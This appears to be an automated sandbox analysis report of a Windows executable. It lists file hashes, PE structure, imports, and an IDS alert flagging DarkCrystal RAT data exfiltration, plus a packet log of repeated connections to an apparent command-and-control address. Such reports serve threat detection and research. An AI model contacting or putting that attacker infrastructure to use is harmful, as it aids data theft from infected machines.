                                                                                                                                                                        File Type:ASCII text, with very long lines (933), with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):933
                                                                                                                                                                        Entropy (8bit):5.907591468925435
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:0v34R7fEpLG1wTJxmnKaYPgqxkXKOqMeSlV5+Tj6hjfj:83+j1w1eKwqiXzqMzleCRj
                                                                                                                                                                        MD5:A1E47197F062B6FBA935F0F97A11DA0B
                                                                                                                                                                        SHA1:72F0CC71135657C3FB135DA03A14E2DA08DE4FAE
                                                                                                                                                                        SHA-256:5E093F309193E6729AC8C503F2521235E9AA73DAC160D0B8D89DB9CD1F8E444F
                                                                                                                                                                        SHA-512:6D19EB6AB6688263BBEC575072C2605D759E892A4B53F97CEC3AE70FF2AA75C86E41644A6BC73AC6B527DC71D010AAD588A3A4726314ECCAA3516F4928AA896E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:vtEuWmWX6jC2oU7bGgBAojsEBfxqFEON83D8AI2oc4lsPJlnEs1B2URLBAs1ypS1Vy3uQ8b8nWhu89y13KlXMMVnm269aBzxltXbQ0WGQ3XfxgMBL07oE5oIcQIYBbimguIPmXlDxfGTzz0Fp5yjDLsqEO89s8EzVv9CY7ZyO41izVTmZCtGn8iVBbKXYmUybQ7Dzxrsf9UJTK1t5VjpP7LWMoA6wBZmjCHiXPxmVAknnZB1kbcCCpjeEl1Lwu5ejskRCTVpi7UOWitxnJWUjXk3cndwYmzlFGE5yuyQGweEVVHg1EhnXl4MIqyZziR6HsIQdy83UFOx3fiGf74TEMNeL1wI5Zbheh7mN1CDFoSRWHTnHr32o825foEmB075orSVi63o40OZ35HDiJAOfi3gpBGiwaCPrXnpz7FLyP7xucCjhAD2ztaFxwqgzV1ey8sfRbOlDzZPlFwM8gBwWJZ87i1CQiVdYd9vuhSFwcyATKesAeiSTFHoititjLUfd61HGAcbO594UZpwDJCwACJSWUMA8iflIThWSWl9BGDYFMUJEvqaIhfaxjuwybcqZYwA1SdqhDv39uMJAC6M1FclyGjtlzKkoX8raTRwS92EwlbCWlvvfQyU6LMvstEs2KPmwftruJ42MXyMohXADZEXinvPGgDi4JMlWzP01EBVW6HiW9GLVEpdF1EIudkOGV8DLNzzRgI8XtBlgM3HZ1M0esffvHGXewOA8EXIJR4z5qFWzcmhkcyPIHidrUDJauekeAnbzu8I7X4ymIqTfixB8920f3azNuYKLf2yzKszeqSuNt0inuo17cmeIw55TI4M9umHQ1dU07gSrHnvC1LcFhNs2XpCOwfWvFvcHtSvRUA96UxAIK2c7bGbh3O3LaGEbKgmWKoTjZLvhNwikp3E3DYT9T5NeYk0N

                                                                                                                                                                        \Device\Null

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\System32\PING.EXE
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):502
                                                                                                                                                                        Entropy (8bit):4.606362154056947
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:POJa95pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:WJ6dUOAokItULVDv
                                                                                                                                                                        MD5:479265214B7D40F1F133ADCA59674F38
                                                                                                                                                                        SHA1:5CE8DE4410682925D3BB0CDBBB4A03405DEAE389
                                                                                                                                                                        SHA-256:524C3EB619E3D256AE2A24827D731AE5943268FC14FFE6D619E2E84C3119C941
                                                                                                                                                                        SHA-512:44D56680467E77DF23F04F7134ED52898347930E4A6F2D52287C24C8799BC91A93F10BD0FEC9A09D27FD607303FD0397A1F78486DACC92637C0FF167AD7ED34C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..Pinging 123716 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):5.011674550380006
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:updIMdPUj8.exe
                                                                                                                                                                        File size:2'937'141 bytes
                                                                                                                                                                        MD5:bc1fb66921db74a0051917b26a4bd316
                                                                                                                                                                        SHA1:fe3667e5c6a3056dac5bae9f2d718466a0b246bc
                                                                                                                                                                        SHA256:b87707b4ec5d92bfb2e13e04201fe95df291612511a4023001d0ec7fcbf88cb3
                                                                                                                                                                        SHA512:db0fce0938ee67375b20b58a40930d1d29e7fe0a021a42327ed45b05ca3e6f4ef18344588193ebfca1779353d9d2123a0bb52333b11959315a9c0cdc926461dd
                                                                                                                                                                        SSDEEP:24576:2TbBv5rUyXVgTcFTujpEPnECw7sUL/4cIG5IuUe1QdcqTHmdyptKB1njjR4nqHFK:IBJ2cFcWPnyMcQmQmqycMxFNyNl
                                                                                                                                                                        TLSH:95D5A0203DEB502AF173EFB54AE4759ADA6FB6B33B07589E205003864713A81DDD163E
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:1515d4d4442f2d2d

                                                                                                                                                                        Static PE Info

                                                                                                                                                                        General

                                                                                                                                                                        Entrypoint:0x41f530
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                        File Version Major:5
                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                        Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                        Instruction
                                                                                                                                                                        call 00007FD85CC0636Bh
                                                                                                                                                                        jmp 00007FD85CC05C7Dh
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        push esi
                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                        mov esi, ecx
                                                                                                                                                                        call 00007FD85CBF8AC7h
                                                                                                                                                                        mov dword ptr [esi], 004356D0h
                                                                                                                                                                        mov eax, esi
                                                                                                                                                                        pop esi
                                                                                                                                                                        pop ebp
                                                                                                                                                                        retn 0004h
                                                                                                                                                                        and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                        mov eax, ecx
                                                                                                                                                                        and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                        mov dword ptr [ecx+04h], 004356D8h
                                                                                                                                                                        mov dword ptr [ecx], 004356D0h
                                                                                                                                                                        ret
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        push esi
                                                                                                                                                                        mov esi, ecx
                                                                                                                                                                        lea eax, dword ptr [esi+04h]
                                                                                                                                                                        mov dword ptr [esi], 004356B8h
                                                                                                                                                                        push eax
                                                                                                                                                                        call 00007FD85CC0910Fh
                                                                                                                                                                        test byte ptr [ebp+08h], 00000001h
                                                                                                                                                                        pop ecx
                                                                                                                                                                        je 00007FD85CC05E0Ch
                                                                                                                                                                        push 0000000Ch
                                                                                                                                                                        push esi
                                                                                                                                                                        call 00007FD85CC053C9h
                                                                                                                                                                        pop ecx
                                                                                                                                                                        pop ecx
                                                                                                                                                                        mov eax, esi
                                                                                                                                                                        pop esi
                                                                                                                                                                        pop ebp
                                                                                                                                                                        retn 0004h
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        sub esp, 0Ch
                                                                                                                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                        call 00007FD85CBF8A42h
                                                                                                                                                                        push 0043BEF0h
                                                                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                        push eax
                                                                                                                                                                        call 00007FD85CC08BC9h
                                                                                                                                                                        int3
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        sub esp, 0Ch
                                                                                                                                                                        lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                        call 00007FD85CC05D88h
                                                                                                                                                                        push 0043C0F4h
                                                                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                        push eax
                                                                                                                                                                        call 00007FD85CC08BACh
                                                                                                                                                                        int3
                                                                                                                                                                        jmp 00007FD85CC0A647h
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        push 00422900h
                                                                                                                                                                        push dword ptr fs:[00000000h]

                                                                                                                                                                        Rich Headers

                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                        Data Directories

                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                        Sections

                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                        Resources

                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                                                                        PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                                                                        RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                                                                                                        RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                                                                                                        RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                                                                                                        RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                                                                                                        RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                                                                                                        RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                                                                                                        RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                                                                                                        RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                                                                                                                                        RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                                                                                                                                        RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                                                                                                                                        RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                                                                                                                                        RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                                                                                                                                        RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                                                                                                                                        RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                                                                        RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                                                                        RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                                                                        RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                                                                                                                                        RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                                                                                                                                        RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                                                                                                                                        RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                                                                                                                                        RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                                                                                                                                        RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                                                                                                                                        RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                                                                                                                                        RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                                                                                                                                        RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                                                                                                        Imports

                                                                                                                                                                        DLLImport
                                                                                                                                                                        KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                                                                                        OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                                                                        gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                                                                                                        Possible Origin

                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                        EnglishUnited States

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                        2025-01-03T07:58:07.640288+01002048130ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST)1192.168.2.44976486.110.194.2880TCP

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Jan 3, 2025 07:57:40.652358055 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:40.657294989 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:40.657413006 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:40.658014059 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:40.662800074 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:41.012522936 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:41.017465115 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:41.357531071 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:41.402268887 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:41.455720901 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:41.455737114 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:41.455805063 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:41.563128948 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:41.567876101 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:41.643462896 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:41.648451090 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:41.648586988 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:41.648694038 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:41.653424978 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:41.781757116 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:41.781928062 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:41.786798000 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:41.996231079 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.001552105 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.001586914 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.001595974 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.006361008 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.006664991 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.011492014 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.225194931 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.225382090 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.230293989 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.372219086 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.450411081 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.451253891 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.456115961 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.505152941 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.505937099 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.605447054 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.671153069 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.671318054 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.677659988 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.677692890 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.721381903 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.722009897 CET4973880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.727797985 CET804973786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.727849007 CET4973780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.728265047 CET804973886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:42.728336096 CET4973880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.728418112 CET4973880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:42.734464884 CET804973886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:43.061712027 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:43.074203968 CET4973880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:43.079103947 CET804973886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:43.079114914 CET804973886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:43.079128027 CET804973886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:43.105391026 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:43.425899029 CET804973886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:43.511653900 CET4973880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:43.557955027 CET804973886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:43.673489094 CET4973880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:44.242952108 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:44.243135929 CET4973880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:44.245568991 CET4973980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:44.248142004 CET804973686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:44.248222113 CET4973680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:44.248384953 CET804973886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:44.248439074 CET4973880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:44.250428915 CET804973986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:44.250927925 CET4973980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:44.251765013 CET4973980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:44.256532907 CET804973986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:44.610259056 CET4973980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:44.615271091 CET804973986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:44.615335941 CET804973986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:44.615365982 CET804973986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:44.942687035 CET804973986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:45.072609901 CET804973986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:45.072794914 CET4973980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:45.357397079 CET4974280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:45.362404108 CET804974286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:45.362467051 CET4974280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:45.363059044 CET4974280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:45.367793083 CET804974286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:45.715049982 CET4974280192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:45.719965935 CET804974286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:45.719979048 CET804974286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:45.720022917 CET804974286.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:46.088067055 CET804974286.110.194.28192.168.2.4
